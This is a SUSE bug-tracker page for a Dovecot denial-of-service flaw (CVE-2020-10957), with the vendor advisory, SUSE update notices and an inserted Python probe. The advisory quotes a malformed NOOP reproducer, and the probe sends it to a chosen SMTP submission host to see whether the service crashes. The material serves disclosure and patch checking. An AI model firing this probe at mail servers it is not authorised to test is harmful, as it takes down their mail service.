Bug 1171457 (CVE-2020-10957) - VUL-0: CVE-2020-10957: dovecot,dovecot23: Sending malformed NOOP command causes crash in submission, submission-login or lmtp service.
Summary: VUL-0: CVE-2020-10957: dovecot,dovecot23: Sending malformed NOOP command cau...
Status: RESOLVED FIXED
Alias: CVE-2020-10957
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Priority: P3 - Medium  Severity: Normal
Target Milestone: ---
Assignee: Peter Varkoly
QA Contact: Security Team bot
URL:
Whiteboard: CVSSv3.1:RedHat:CVE-2020-10957:7.5:(A...
Keywords:
Depends on:
Blocks:
 
Reported: 2020-05-11 11:37 UTC by Marcus Meissner
Modified: 2020-05-26 13:16 UTC

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Comment 3 Alexandros Toptsoglou 2020-05-18 14:30:09 UTC
now public through 

https://dovecot.org/pipermail/dovecot-news/2020-May/000438.html

Internal reference: DOV-3784
Vulnerability type: NULL pointer dereference (CWE-476)
Vulnerable version: 2.3.0 - 2.3.10
Vulnerable component: submission, lmtp
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.3.10.1
Researcher credits: Philippe Antoine (Catena Cyber)
Vendor notification: 2020-03-24
Solution date: 2020-04-02
Public disclosure: 2020-05-18
CVE reference: CVE-2020-10957
CVSS: 7.5  (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
	Sending malformed NOOP command causes crash in submission, submission-login or
	lmtp service.

Risk:
	A remote attacker can keep the submission-login service down, causing a denial
	of service. For lmtp the risk is negligible, as lmtp is usually behind a
	trusted MTA.

Steps to reproduce:
	Send ``NOOP EE"FY`` to the submission port, or a similarly malformed command.

Solution:
	Upgrade to fixed version.
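The reproducer quoted in the advisory above, turned into a check you can run against your own hosts. This is an added example, not code from the bug report or from Dovecot: a small Python probe speaks just enough SMTP to reach the command loop, sends the advisory's `NOOP EE"FY`, and classifies the server's reaction. A fixed server answers the malformed command with a status code; a crashed submission-login process shows up as the connection closing with no reply at all. The default port 587 is the standard submission port; the host name, the result labels, and the in-process fake server used to exercise the probe offline are assumptions constructed for this example, not observed Dovecot output.

```python
"""
Probe whether an SMTP submission service survives the malformed NOOP from
the CVE-2020-10957 advisory.  Added example; not Dovecot's code.

Assumed/constructed for this example: the result labels returned by probe(),
the default port, and the fake SMTP server in serve_once().
"""
import socket
import threading

# The exact reproducer quoted in the advisory: NOOP with a stray quote in
# the parameter.  Nothing else about the bug's internals is assumed here.
MALFORMED_NOOP = b'NOOP EE"FY\r\n'


def _read_reply(f):
    """Read one (possibly multi-line) SMTP reply; return '' if the peer closed."""
    lines = []
    while True:
        line = f.readline()
        if not line:
            return ""  # EOF: the server went away without answering
        lines.append(line)
        # "250 text" (space after the code) ends a reply; "250-text" continues it.
        if len(line) >= 4 and line[3:4] == b" ":
            return b"".join(lines).decode("utf-8", "replace")


def probe(sock, timeout=5.0):
    """
    Drive an already-connected socket through banner and EHLO, send the
    malformed NOOP, and report the outcome:
      'replied'       server answered with a status code (expected on 2.3.10.1+)
      'disconnected'  connection dropped with no reply (consistent with a crash)
      'timeout'       no answer within the timeout (inconclusive)
      'no-banner' / 'ehlo-rejected'  we never reached the command loop
    """
    sock.settimeout(timeout)
    f = sock.makefile("rb")
    try:
        if not _read_reply(f).startswith("220"):
            return "no-banner"
        sock.sendall(b"EHLO probe.example\r\n")
        if not _read_reply(f).startswith("250"):
            return "ehlo-rejected"
        sock.sendall(MALFORMED_NOOP)
        return "replied" if _read_reply(f) else "disconnected"
    except socket.timeout:
        return "timeout"
    except ConnectionError:  # RST from a dying process also lands here
        return "disconnected"
    finally:
        f.close()


def probe_host(host, port=587, timeout=5.0):
    """Connect to host:port (587 = submission) and run probe() on it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return probe(s, timeout)


def serve_once(behaviour):
    """
    Minimal fake SMTP server on 127.0.0.1 that handles one connection, so the
    probe can be exercised offline (constructed for this example).
      'fixed'  answers the malformed NOOP with a 501 syntax error
      'crash'  closes the connection without replying, like a crashed process
    Returns the port it listens on.
    """
    ls = socket.socket()
    ls.bind(("127.0.0.1", 0))
    ls.listen(1)
    port = ls.getsockname()[1]

    def run():
        conn, _ = ls.accept()
        ls.close()
        with conn, conn.makefile("rb") as f:
            conn.sendall(b"220 fake.example ESMTP\r\n")
            f.readline()  # EHLO
            conn.sendall(b"250-fake.example\r\n250 PIPELINING\r\n")
            f.readline()  # the malformed NOOP
            if behaviour == "fixed":
                conn.sendall(b"501 5.5.4 Invalid parameters\r\n")
            # 'crash': fall out of the with-block and close without a reply

    threading.Thread(target=run, daemon=True).start()
    return port


if __name__ == "__main__":
    print("fixed server :", probe_host("127.0.0.1", serve_once("fixed")))
    print("crashed server:", probe_host("127.0.0.1", serve_once("crash")))
```

Only point this at hosts you are authorized to test: per the advisory, on an unpatched 2.3.0 to 2.3.10 it takes the submission-login process down. A 'disconnected' result is evidence, not proof; a connection can also drop for reasons unrelated to this bug, so confirm with the service's own logs and the installed package version.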
Comment 4 OBSbugzilla Bot 2020-05-18 17:00:25 UTC
This is an autogenerated message for OBS integration:
This bug (1171457) was mentioned in
https://build.opensuse.org/request/show/807017 Factory / dovecot23
Comment 5 Swamp Workflow Management 2020-05-22 10:13:38 UTC
SUSE-SU-2020:1380-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1171456,1171457,1171458
CVE References: CVE-2020-10957,CVE-2020-10958,CVE-2020-10967
Sources used:
SUSE Linux Enterprise Module for Server Applications 15-SP1 (src):    dovecot23-2.3.10-11.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 6 Swamp Workflow Management 2020-05-22 10:14:47 UTC
SUSE-SU-2020:1379-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1171456,1171457,1171458
CVE References: CVE-2020-10957,CVE-2020-10958,CVE-2020-10967
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    dovecot23-2.3.10-4.22.1
SUSE Linux Enterprise Server 15-LTSS (src):    dovecot23-2.3.10-4.22.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    dovecot23-2.3.10-4.22.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    dovecot23-2.3.10-4.22.1

Comment 7 Swamp Workflow Management 2020-05-26 13:14:28 UTC
openSUSE-SU-2020:0720-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1171456,1171457,1171458
CVE References: CVE-2020-10957,CVE-2020-10958,CVE-2020-10967
Sources used:
openSUSE Leap 15.1 (src):    dovecot23-2.3.10-lp151.2.9.1
Comment 8 Alexandros Toptsoglou 2020-05-26 13:16:27 UTC
Done